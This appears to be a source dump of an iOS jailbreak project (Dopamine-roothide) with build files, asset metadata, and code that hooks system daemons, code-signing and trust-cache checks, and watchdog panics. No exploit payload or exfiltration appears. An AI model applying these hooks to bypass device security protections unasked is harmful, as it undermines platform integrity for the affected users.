-------------------------------------------------------------------------------- 1 | #import 2 | int getCSBlobOffsetAndSize(FILE* machoFile, uint32_t* outOffset, uint32_t* outSize); 3 | 4 | NSString *processRpaths(NSString *path, NSString *tokenName, NSArray *rpaths); 5 | NSString *resolveLoadPath(NSString *loadPath, NSString *machoPath, NSString *sourceExecutablePath, NSArray *rpaths); 6 | int evaluateSignature(NSURL* fileURL, NSData **cdHashOut, BOOL *isAdhocSignedOut); 7 | BOOL isCdHashInTrustCache(NSData *cdHash); 8 | int loadEmbeddedSignature(FILE *file); -------------------------------------------------------------------------------- /BaseBin/roothidehooks/.gitignore: -------------------------------------------------------------------------------- 1 | .theos/ 2 | packages/ 3 | .DS_Store 4 | -------------------------------------------------------------------------------- /BaseBin/roothidehooks/Makefile: -------------------------------------------------------------------------------- 1 | TARGET := iphone:clang:latest:15.0 2 | INSTALL_TARGET_PROCESSES = lsd cfprefsd 3 | FINALPACKAGE = 1 4 | ARCHS = arm64e 5 | 6 | THEOS_PACKAGE_SCHEME = roothide 7 | 8 | include $(THEOS)/makefiles/common.mk 9 | 10 | TWEAK_NAME = roothidehooks 11 | 12 | roothidehooks_FILES = $(wildcard *.x) $(wildcard *.c) $(wildcard *.m) 13 | roothidehooks_CFLAGS = -Werror -fobjc-arc -I../_shared 14 | roothidehooks_LDFLAGS = -rpath @loader_path/.jbroot/Library/Frameworks -rpath @loader_path/fallback 15 | 16 | lsd.x_CFLAGS = -fno-objc-arc #lsd using mrc 17 | 18 | include $(THEOS_MAKE_PATH)/tweak.mk 19 | 20 | after-roothidehooks-all:: 21 | install_name_tool -change @loader_path/.jbroot/usr/lib/libsubstrate.dylib @rpath/CydiaSubstrate.framework/CydiaSubstrate $(THEOS_OBJ_DIR)/roothidehooks.dylib 22 | ldid -S $(THEOS_OBJ_DIR)/roothidehooks.dylib 23 | -------------------------------------------------------------------------------- /BaseBin/roothidehooks/common.h: -------------------------------------------------------------------------------- 1 | 2 | #include 3 | 4 | 5 | bool isJailbreakPath(const char* path); 6 | 7 | bool isNormalAppPath(const char* path); 8 | 9 | bool isSandboxedApp(pid_t pid, const char* path); 10 | 11 | int proc_pidpath(int pid, void * buffer, uint32_t buffersize) __OSX_AVAILABLE_STARTING(__MAC_10_5, __IPHONE_2_0); 12 | 13 | bool isBlacklisted(const char* path); 14 | BOOL isBlacklistedApp(NSString* identifier); 15 | 16 | /* csops operations */ 17 | #define CS_OPS_STATUS 0 /* return status */ 18 | #define CS_PLATFORM_BINARY 0x04000000 /* this is a platform binary */ 19 | int csops(pid_t pid, unsigned int ops, void * useraddr, size_t usersize); 20 | 21 | //These apps may be signed with a (fake) certificate 22 | #define SENSITIVE_APP_LIST @[ \ 23 | @"com.icraze.gtatracker", \ 24 | @"com.Alfie.TrollInstallerX", \ 25 | @"com.opa334.Dopamine", \ 26 | @"com.opa334.Dopamine.roothide", \ 27 | @"com.opa334.Dopamine-roothide", \ 28 | ] 29 | -------------------------------------------------------------------------------- /BaseBin/roothidehooks/installd.x: -------------------------------------------------------------------------------- 1 | #import 2 | 3 | // BOOTLOOP RISK, DO NOT TOUCH 4 | /*%hook MIGlobalConfiguration 5 | 6 | - (NSMutableDictionary *)_bundleIDMapForBundlesInDirectory:(NSURL *)directoryURL 7 | withExtension:(NSString *)extension 8 | loadingAdditionalKeys:(NSSet *)additionalKeys 9 | { 10 | NSLog(@"_bundleIDMapForBundlesInDirectory(%@, %@, %@)", directoryURL, extension, additionalKeys); 11 | 12 | if ([directoryURL.path isEqualToString:@"/Applications"] && [extension isEqualToString:@"app"]) { 13 | NSMutableDictionary *origMap = %orig; 14 | 15 | NSURL *rootlessAppDir = [NSURL fileURLWithPath:@"/var/jb/Applications" isDirectory:YES]; 16 | NSMutableDictionary *rootlessAppsMap = %orig(rootlessAppDir, extension, additionalKeys); 17 | [origMap addEntriesFromDictionary:rootlessAppsMap]; 18 | return origMap; 19 | } 20 | 21 | return %orig; 22 | } 23 | 24 | %end*/ 25 | 26 | void installdInit(void) 27 | { 28 | %init(); 29 | } 30 | -------------------------------------------------------------------------------- /BaseBin/roothidehooks/main.x: -------------------------------------------------------------------------------- 1 | #import 2 | #import 3 | 4 | #ifndef DEBUG 5 | #define NSLog(args...) 6 | #endif 7 | 8 | NSString* safe_getExecutablePath() 9 | { 10 | char executablePathC[PATH_MAX]; 11 | uint32_t executablePathCSize = sizeof(executablePathC); 12 | _NSGetExecutablePath(&executablePathC[0], &executablePathCSize); 13 | return [NSString stringWithUTF8String:executablePathC]; 14 | } 15 | 16 | NSString* getProcessName() 17 | { 18 | return safe_getExecutablePath().lastPathComponent; 19 | } 20 | 21 | %ctor 22 | { 23 | NSLog(@"roothidehooks coming... %@", safe_getExecutablePath()); 24 | NSString *processName = getProcessName(); 25 | /*if ([processName isEqualToString:@"installd"]) { 26 | extern void installdInit(void); 27 | installdInit(); 28 | } 29 | else*/ if ([processName isEqualToString:@"cfprefsd"]) { 30 | extern void cfprefsdInit(void); 31 | cfprefsdInit(); 32 | } 33 | else if ([processName isEqualToString:@"lsd"]) { 34 | extern void lsdInit(void); 35 | lsdInit(); 36 | } 37 | else if ([processName isEqualToString:@"SpringBoard"]) { 38 | extern void sbInit(void); 39 | sbInit(); 40 | } 41 | } -------------------------------------------------------------------------------- /BaseBin/roothidehooks/pathhook.x: -------------------------------------------------------------------------------- 1 | #import 2 | #import 3 | #include 4 | 5 | #ifndef DEBUG 6 | #define NSLog(args...) 7 | #endif 8 | 9 | CFURLRef (*orig__CFCopyHomeDirURLForUser)(const char *username, bool fallBackToHome) = NULL; 10 | CFURLRef new__CFCopyHomeDirURLForUser(const char *username, bool fallBackToHome) 11 | { 12 | CFURLRef url = orig__CFCopyHomeDirURLForUser(username, fallBackToHome); 13 | 14 | char path[PATH_MAX]={0}; 15 | if(CFURLGetFileSystemRepresentation(url, 0, (UInt8*)path, sizeof(path))) 16 | { 17 | const char* jbpath = rootfs(path); 18 | if(strncmp(jbpath, "/rootfs/", sizeof("/rootfs/")-1) == 0) 19 | { 20 | CFRelease(url); 21 | 22 | const char* newpath = jbroot(path); 23 | url = CFURLCreateFromFileSystemRepresentation(kCFAllocatorDefault, (const UInt8*)newpath, strlen(newpath), true); 24 | } 25 | } 26 | 27 | return url; 28 | } 29 | 30 | __attribute__((visibility("default"))) void pathhook() 31 | { 32 | NSLog(@"pathhook.."); 33 | 34 | MSImageRef coreFoundationImage = MSGetImageByName("/System/Library/Frameworks/CoreFoundation.framework/CoreFoundation"); 35 | void* _CFCopyHomeDirURLForUser_ptr = MSFindSymbol(coreFoundationImage, "__CFCopyHomeDirURLForUser"); 36 | if(_CFCopyHomeDirURLForUser_ptr) 37 | { 38 | MSHookFunction(_CFCopyHomeDirURLForUser_ptr, (void *)&new__CFCopyHomeDirURLForUser, (void **)&orig__CFCopyHomeDirURLForUser); 39 | NSLog(@"hook __CFCopyHomeDirURLForUser %p => %p : %p", _CFCopyHomeDirURLForUser_ptr, new__CFCopyHomeDirURLForUser, orig__CFCopyHomeDirURLForUser); 40 | } 41 | } 42 | -------------------------------------------------------------------------------- /BaseBin/systemhook/Makefile: -------------------------------------------------------------------------------- 1 | TARGET = systemhook.dylib 2 | CC = clang 3 | 4 | CFLAGS = -Werror -I../_shared -I./src -isysroot $(shell xcrun --sdk iphoneos --show-sdk-path) -arch arm64e -miphoneos-version-min=15.0 -Wno-deprecated-declarations -Os -moutline 5 | LDFLAGS = -dynamiclib 6 | 7 | sign: $(TARGET) 8 | @strip -N $^ 9 | @ldid -S $^ 10 | 11 | $(TARGET): $(wildcard src/*.c) 12 | $(CC) $(CFLAGS) $(LDFLAGS) -o $@ $^ 13 | 14 | clean: 15 | @rm -f $(TARGET) -------------------------------------------------------------------------------- /BaseBin/systemhook/src/common.h: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | #define SYSLOG(...) {openlog("systemhook",LOG_PID,LOG_AUTH);syslog(LOG_DEBUG, __VA_ARGS__);closelog();} 6 | 7 | #define JB_ENV_REQUIRED_COUNT 5 8 | 9 | extern char* JBRAND; 10 | extern char* JBROOT; 11 | 12 | extern char *JB_SandboxExtensions; 13 | extern char *JB_SandboxExtensions2; 14 | extern char *JB_RootPath; 15 | extern bool swh_is_debugged; 16 | #define JB_ROOT_PATH(path) ({ \ 17 | char *outPath = alloca(PATH_MAX); \ 18 | strlcpy(outPath, JB_RootPath, PATH_MAX); \ 19 | strlcat(outPath, path, PATH_MAX); \ 20 | (outPath); \ 21 | }) 22 | 23 | bool stringStartsWith(const char *str, const char* prefix); 24 | bool stringEndsWith(const char* str, const char* suffix); 25 | 26 | int64_t jbdswFixSetuid(void); 27 | int64_t jbdswProcessBinary(const char *filePath); 28 | int64_t jbdswProcessLibrary(const char *filePath); 29 | int64_t jbdswDebugMe(void); 30 | int64_t jbdswInterceptUserspacePanic(const char *messageString); 31 | 32 | int64_t jbdswRebootUserspace(); 33 | int64_t jbdswPatchSpawn(int pid, bool resume); 34 | int64_t jbdswPatchExecAdd(const char* execfile, bool resume); 35 | int64_t jbdswPatchExecDel(const char* execfile); 36 | int64_t jbdswLockDSCPage(uint64_t address, uint64_t size); 37 | 38 | int resolvePath(const char *file, const char *searchPath, int (^attemptHandler)(char *path)); 39 | int spawn_hook_common(pid_t *restrict pid, const char *restrict path, 40 | const posix_spawn_file_actions_t *restrict file_actions, 41 | const posix_spawnattr_t *restrict attrp, 42 | char *const argv[restrict], 43 | char *const envp[restrict], 44 | void *pspawn_org); -------------------------------------------------------------------------------- /BaseBin/systemhook/src/envbuf.h: -------------------------------------------------------------------------------- 1 | int envbuf_len(const char *envp[]); 2 | char **envbuf_mutcopy(const char *envp[]); 3 | void envbuf_free(char *envp[]); 4 | int envbuf_find(const char *envp[], const char *name); 5 | const char *envbuf_getenv(const char *envp[], const char *name); 6 | void envbuf_setenv(char **envpp[], const char *name, const char *value, int overwrite); 7 | void envbuf_unsetenv(char **envpp[], const char *name); -------------------------------------------------------------------------------- /BaseBin/systemhook/src/launchd.h: -------------------------------------------------------------------------------- 1 | #define OS_ALLOC_ONCE_KEY_MAX 100 2 | 3 | struct _os_alloc_once_s { 4 | long once; 5 | void *ptr; 6 | }; 7 | 8 | struct xpc_global_data { 9 | uint64_t a; 10 | uint64_t xpc_flags; 11 | mach_port_t task_bootstrap_port; /* 0x10 */ 12 | #ifndef _64 13 | uint32_t padding; 14 | #endif 15 | xpc_object_t xpc_bootstrap_pipe; /* 0x18 */ 16 | // and there's more, but you'll have to wait for MOXiI 2 for those... 17 | // ... 18 | }; 19 | 20 | extern struct _os_alloc_once_s _os_alloc_once_table[]; 21 | extern void* _os_alloc_once(struct _os_alloc_once_s *slot, size_t sz, os_function_t init); 22 | -------------------------------------------------------------------------------- /BaseBin/systemhook/upload.sh: -------------------------------------------------------------------------------- 1 | set -e 2 | 3 | PROJECT_NAME=systemhook.dylib 4 | DEVICE=root@localhost 5 | PORT=2223 6 | 7 | make 8 | ssh $DEVICE -p $PORT "rm -rf /tmp/$PROJECT_NAME" 9 | scp -P$PORT ./$PROJECT_NAME $DEVICE:/tmp/$PROJECT_NAME 10 | ssh $DEVICE -p $PORT "/basebin/jbctl rebuild_trustcache" -------------------------------------------------------------------------------- /BaseBin/tar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/BaseBin/tar -------------------------------------------------------------------------------- /BaseBin/upload.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | ./pack.sh || exit 4 | 5 | DEVICE=root@iphone11.local 6 | PORT=22 7 | ssh $DEVICE -p $PORT "rm -rf /rootfs/var/mobile/Documents/basebin.tar" 8 | scp -P$PORT ../Dopamine/Dopamine/bootstrap/basebin.tar $DEVICE:/rootfs/var/mobile/Documents/basebin.tar 9 | ssh $DEVICE -p $PORT "/basebin/jbctl update basebin /var/mobile/Documents/basebin.tar" 10 | 11 | -------------------------------------------------------------------------------- /BaseBin/watchdoghook/Makefile: -------------------------------------------------------------------------------- 1 | TARGET = watchdoghook.dylib 2 | CC = clang 3 | 4 | CFLAGS = -Werror -framework Foundation -framework CoreServices -framework Security -I../_shared -I./src -isysroot $(shell xcrun --sdk iphoneos --show-sdk-path) -arch arm64e -miphoneos-version-min=15.0 -fobjc-arc -O2 5 | LDFLAGS = -dynamiclib -rpath @loader_path/.jbroot/Library/Frameworks -rpath @loader_path/fallback -L../_shared -lellekit -framework IOKit 6 | 7 | sign: $(TARGET) 8 | @ldid -S $^ 9 | 10 | $(TARGET): $(wildcard src/*.m) 11 | $(CC) $(CFLAGS) $(LDFLAGS) -o $@ $^ 12 | 13 | clean: 14 | @rm -f $(TARGET) -------------------------------------------------------------------------------- /BaseBin/watchdoghook/src/main.m: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | #include "substrate.h" 7 | 8 | int64_t (*jbdswInterceptUserspacePanic)(const char *messageString) = NULL; 9 | kern_return_t (*IOConnectCallStructMethod_orig)(mach_port_t connection, uint32_t selector, const void *inputStruct, size_t inputStructCnt, void *outputStruct, size_t *outputStructCnt) = NULL; 10 | kern_return_t (*IOServiceOpen_orig)(io_service_t service, task_port_t owningTask, uint32_t type, io_connect_t *connect); 11 | mach_port_t gIOWatchdogConnection = MACH_PORT_NULL; 12 | 13 | kern_return_t IOServiceOpen_hook(io_service_t service, task_port_t owningTask, uint32_t type, io_connect_t *connect) 14 | { 15 | kern_return_t orig = IOServiceOpen_orig(service, owningTask, type, connect); 16 | if (orig == KERN_SUCCESS && connect) { 17 | if (IOObjectConformsTo(service, "IOWatchdog")) { 18 | // save mach port of IOWatchdog for check later 19 | gIOWatchdogConnection = *connect; 20 | } 21 | } 22 | return orig; 23 | } 24 | 25 | kern_return_t IOConnectCallStructMethod_hook(mach_port_t connection, uint32_t selector, const void *inputStruct, size_t inputStructCnt, void *outputStruct, size_t *outputStructCnt) 26 | { 27 | if (connection == gIOWatchdogConnection) { 28 | if (selector == 2) { 29 | return jbdswInterceptUserspacePanic((const char *)inputStruct); 30 | } 31 | } 32 | return IOConnectCallStructMethod_orig(connection, selector, inputStruct, inputStructCnt, outputStruct, outputStructCnt); 33 | } 34 | 35 | __attribute__((constructor)) static void initializer(void) 36 | { 37 | jbdswInterceptUserspacePanic = dlsym(RTLD_DEFAULT, "jbdswInterceptUserspacePanic"); 38 | MSHookFunction(IOServiceOpen, (void *)&IOServiceOpen_hook, (void **)&IOServiceOpen_orig); 39 | MSHookFunction(IOConnectCallStructMethod, (void *)&IOConnectCallStructMethod_hook, (void **)&IOConnectCallStructMethod_orig); 40 | } -------------------------------------------------------------------------------- /Dopamine/.gitignore: -------------------------------------------------------------------------------- 1 | /build 2 | /Dopamine.tipa 3 | /Dopamine/bootstrap/basebin.tar -------------------------------------------------------------------------------- /Dopamine/Dopamine.xcodeproj/project.xcworkspace/contents.xcworkspacedata: -------------------------------------------------------------------------------- 1 | 2 | 4 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /Dopamine/Dopamine.xcodeproj/project.xcworkspace/xcshareddata/IDEWorkspaceChecks.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | IDEDidComputeMac32BitWarning 6 | 7 | 8 | 9 | -------------------------------------------------------------------------------- /Dopamine/Dopamine.xcodeproj/project.xcworkspace/xcshareddata/swiftpm/Package.resolved: -------------------------------------------------------------------------------- 1 | { 2 | "object": { 3 | "pins": [ 4 | { 5 | "package": "SwiftfulLoadingIndicators", 6 | "repositoryURL": "https://github.com/SwiftfulThinking/SwiftfulLoadingIndicators", 7 | "state": { 8 | "branch": null, 9 | "revision": "85858c0246dcd781228301f9928519f75ce89758", 10 | "version": "0.0.4" 11 | } 12 | }, 13 | { 14 | "package": "SwiftMachO", 15 | "repositoryURL": "https://github.com/pinauten/SwiftMachO", 16 | "state": { 17 | "branch": "master", 18 | "revision": "7bcffb07259191f7103ded3d29c77f05b7fed396", 19 | "version": null 20 | } 21 | }, 22 | { 23 | "package": "SwiftUtils", 24 | "repositoryURL": "https://github.com/pinauten/SwiftUtils", 25 | "state": { 26 | "branch": "master", 27 | "revision": "1d37faabb4c58b3152394c9b6e1c1a68507646b9", 28 | "version": null 29 | } 30 | }, 31 | { 32 | "package": "zstd", 33 | "repositoryURL": "https://github.com/facebook/zstd.git", 34 | "state": { 35 | "branch": "dev", 36 | "revision": "e256e4327459b77b14b300a7bc72b5a931cd1e56", 37 | "version": null 38 | } 39 | } 40 | ] 41 | }, 42 | "version": 1 43 | } 44 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/AccentColor.colorset/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "colors" : [ 3 | { 4 | "color" : { 5 | "color-space" : "srgb", 6 | "components" : { 7 | "alpha" : "1.000", 8 | "blue" : "0.529", 9 | "green" : "0.667", 10 | "red" : "0.020" 11 | } 12 | }, 13 | "idiom" : "universal" 14 | } 15 | ], 16 | "info" : { 17 | "author" : "xcode", 18 | "version" : 1 19 | } 20 | } 21 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/1024.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/1024.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/icon-1024.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/icon-1024.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/icon-20-ipad.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/icon-20-ipad.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/icon-20@2x-ipad.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/icon-20@2x-ipad.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/icon-20@2x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/icon-20@2x.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/icon-20@3x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/icon-20@3x.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/icon-29-ipad.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/icon-29-ipad.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/icon-29.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/icon-29.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/icon-29@2x-ipad.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/icon-29@2x-ipad.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/icon-29@2x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/icon-29@2x.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/icon-29@3x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/icon-29@3x.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/icon-40.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/icon-40.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/icon-40@2x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/icon-40@2x.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/icon-40@3x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/icon-40@3x.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/icon-60@2x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/icon-60@2x.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/icon-60@3x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/icon-60@3x.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/icon-76.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/icon-76.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/icon-76@2x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/icon-76@2x.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/icon-83.5@2x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/Dopamine/Dopamine/Assets.xcassets/AppIcon.appiconset/icon-83.5@2x.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Backgrounds/Clouds.imageset/Clouds@3x.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/Dopamine/Dopamine/Assets.xcassets/Backgrounds/Clouds.imageset/Clouds@3x.jpg -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Backgrounds/Clouds.imageset/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "images" : [ 3 | { 4 | "filename" : "Clouds.png", 5 | "idiom" : "universal", 6 | "scale" : "1x" 7 | }, 8 | { 9 | "filename" : "Clouds@2x.png", 10 | "idiom" : "universal", 11 | "scale" : "2x" 12 | }, 13 | { 14 | "filename" : "Clouds@3x.jpg", 15 | "idiom" : "universal", 16 | "scale" : "3x" 17 | } 18 | ], 19 | "info" : { 20 | "author" : "xcode", 21 | "version" : 1 22 | } 23 | } 24 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Backgrounds/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "info" : { 3 | "author" : "xcode", 4 | "version" : 1 5 | } 6 | } 7 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Backgrounds/Wallpaper.imageset/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "images" : [ 3 | { 4 | "idiom" : "universal", 5 | "scale" : "1x" 6 | }, 7 | { 8 | "idiom" : "universal", 9 | "scale" : "2x" 10 | }, 11 | { 12 | "filename" : "pexels-soubhagya-maharana-4124435.jpg", 13 | "idiom" : "universal", 14 | "scale" : "3x" 15 | } 16 | ], 17 | "info" : { 18 | "author" : "xcode", 19 | "version" : 1 20 | } 21 | } 22 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Backgrounds/Wallpaper.imageset/pexels-soubhagya-maharana-4124435.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/Dopamine/Dopamine/Assets.xcassets/Backgrounds/Wallpaper.imageset/pexels-soubhagya-maharana-4124435.jpg -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "info" : { 3 | "author" : "xcode", 4 | "version" : 1 5 | } 6 | } 7 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Easter Eggs/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "info" : { 3 | "author" : "xcode", 4 | "version" : 1 5 | } 6 | } 7 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Easter Eggs/fr.imageset/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "images" : [ 3 | { 4 | "idiom" : "universal", 5 | "scale" : "1x" 6 | }, 7 | { 8 | "filename" : "fr.png", 9 | "idiom" : "universal", 10 | "scale" : "2x" 11 | }, 12 | { 13 | "idiom" : "universal", 14 | "scale" : "3x" 15 | } 16 | ], 17 | "info" : { 18 | "author" : "xcode", 19 | "version" : 1 20 | } 21 | } 22 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Easter Eggs/fr.imageset/fr.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/Dopamine/Dopamine/Assets.xcassets/Easter Eggs/fr.imageset/fr.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Logos/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "info" : { 3 | "author" : "xcode", 4 | "version" : 1 5 | } 6 | } 7 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Logos/DopamineLogo.imageset/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "images" : [ 3 | { 4 | "filename" : "DopamineLogo@1x.png", 5 | "idiom" : "universal", 6 | "scale" : "1x" 7 | }, 8 | { 9 | "filename" : "DopamineLogo@2x.png", 10 | "idiom" : "universal", 11 | "scale" : "2x" 12 | }, 13 | { 14 | "filename" : "DopamineLogo@3x.png", 15 | "idiom" : "universal", 16 | "scale" : "3x" 17 | } 18 | ], 19 | "info" : { 20 | "author" : "xcode", 21 | "version" : 1 22 | } 23 | } 24 | -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Logos/DopamineLogo.imageset/DopamineLogo@1x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/Dopamine/Dopamine/Assets.xcassets/Logos/DopamineLogo.imageset/DopamineLogo@1x.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Logos/DopamineLogo.imageset/DopamineLogo@2x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/Dopamine/Dopamine/Assets.xcassets/Logos/DopamineLogo.imageset/DopamineLogo@2x.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Logos/DopamineLogo.imageset/DopamineLogo@3x.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/Dopamine/Dopamine/Assets.xcassets/Logos/DopamineLogo.imageset/DopamineLogo@3x.png -------------------------------------------------------------------------------- /Dopamine/Dopamine/Assets.xcassets/Logos/DopamineLogo2.imageset/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "images" : [ 3 | { 4 | "filename" : "DopamineLogo@1x.png", 5 | "idiom" : "universal", 6 | "scale" : "1x" 7 | }, 8 | { 9 | "filename" : "DopamineLogo@2x.png", 10 | "idiom" : "universal", 11 | "scale" : "2x" 12 | }, 13 | { 14 | "filename" : "DopamineLogo@3x.png", 15 | "idiom" : "universal", 16 | "scale" : "3x" 17 | } 18 | ], 19 | "info" : { 20 | "author" : "xcode", 21 | "version" : 1 22 | } 23 | } 24 | -------------------------------------------------------------------------------- 